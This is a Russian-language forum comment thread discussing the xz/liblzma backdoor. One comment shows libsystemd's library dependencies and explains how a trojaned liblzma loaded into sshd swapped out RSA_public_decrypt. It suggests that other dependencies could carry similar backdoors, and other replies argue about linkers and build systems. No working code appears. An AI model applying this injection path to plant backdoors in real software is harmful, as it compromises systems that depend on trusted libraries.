Проблема "зашита" в libsystemd: ldd /lib/x86_64-linux-gnu/libsystemd.so.0 linux-vdso.so.1 (0x00007ffea1bfd000) librt.so.1 => /lib/x86_64-linux-gnu/librt.so.1 (0x00007fe963f05000) liblzma.so.5 => /lib/x86_64-linux-gnu/liblzma.so.5 (0x00007fe963edc000) liblz4.so.1 => /lib/x86_64-linux-gnu/liblz4.so.1 (0x00007fe963ebb000) libgcrypt.so.20 => /lib/x86_64-linux-gnu/libgcrypt.so.20 (0x00007fe963d9d000) libpthread.so.0 => /lib/x86_64-linux-gnu/libpthread.so.0 (0x00007fe963d7a000) libc.so.6 => /lib/x86_64-linux-gnu/libc.so.6 (0x00007fe963b88000) /lib64/ld-linux-x86-64.so.2 (0x00007fe963fd6000) libgpg-error.so.0 => /lib/x86_64-linux-gnu/libgpg-error.so.0 (0x00007fe963b63000) Т.е. аналогичный бакдор можно было внедрить в liblz4.so, или libgpg-error.so.Этой схеме подвержены любые сервисы, слинкованные с libsystemd.so и выполняющие авторизацию pubkey. При загрузке libsystemd.so загружаются зависимые либы и, в случае трояненой liblzma.so, происходила подмена для sshd функции "RSA_public_decrypt" (низкий поклон systemd). Просто автор бакдора ограничил работу только sshd (проверка argv[0] = /usr/sbin/sshd)
- Нужно решение на базе линкера, запрещающее динамически линковать 2 либы с конфли, Аноним (293), 15:47 , 30-Мрт-24 (295)
- Нужно использовать простое и доверенное ПО Но это в идеальном мире, а в реально, Ананоним (?), 15:53 , 30-Мрт-24 (298)
- А как я буду malloc заменять , Аноним (292), 16:06 , 30-Мрт-24 (304)
- Ты думаешь, что когда при сборке sshd с ним линковался libsystemd so, ликер буде, Аноним (84), 18:33 , 30-Мрт-24 (315)
- Всегда знал, что баш-портянки, регулярные выражения и всякие прочие нечитаемые н, Аноним (316), 18:34 , 30-Мрт-24 (316)
Всегда знал, что баш-портянки, регулярные выражения и всякие прочие нечитаемые недоязыки (типа Makefike) - это зло. Если бы выкинули это легаси родом из 70-х и пререшли на нормальную систему сборки (хоть CMake) - проблемы бы не было.Вообще легаси нужно чистить периодически, а то в мусорной куче заводятся крысы и прочие паразиты.
- Всегда знал, и не исправил Может ты специально ничего не зделал , Аноним (345), 02:45 , 31-Мрт-24 (346)
- Что не так с Makefile , Легивон (?), 10:59 , 31-Мрт-24 (361)
- Ваш CMake также поимели, даже не используя никакие регулярные выраженияhttps w, Аноним (-), 12:36 , 01-Апр-24 (403)
- В Tumbleweed сегодня из-за этого весь репозиторий пересобрали Прилетело обновле, Berkut (??), 03:22 , 31-Мрт-24 (348)
В Tumbleweed сегодня из-за этого весь репозиторий пересобрали. Прилетело обновление на 4500 пакетов. Осталось поменять пароли и жить спокойно.
- Интересно, как оно в ЧПУКС работает , IdeaFix (ok), 10:07 , 31-Мрт-24 (355)
Интересно, как оно в ЧПУКС работает...
- Видимо xz настолько заброшен, что никто однострочник с eval не увидел , Пряник (?), 09:59 , 01-Апр-24 (400)
Видимо xz настолько заброшен, что никто однострочник с eval не увидел.
- Так вот зачем китайцы стучатся по SSH , Пряник (?), 10:01 , 01-Апр-24 (401)
Так вот зачем китайцы стучатся по SSH!
|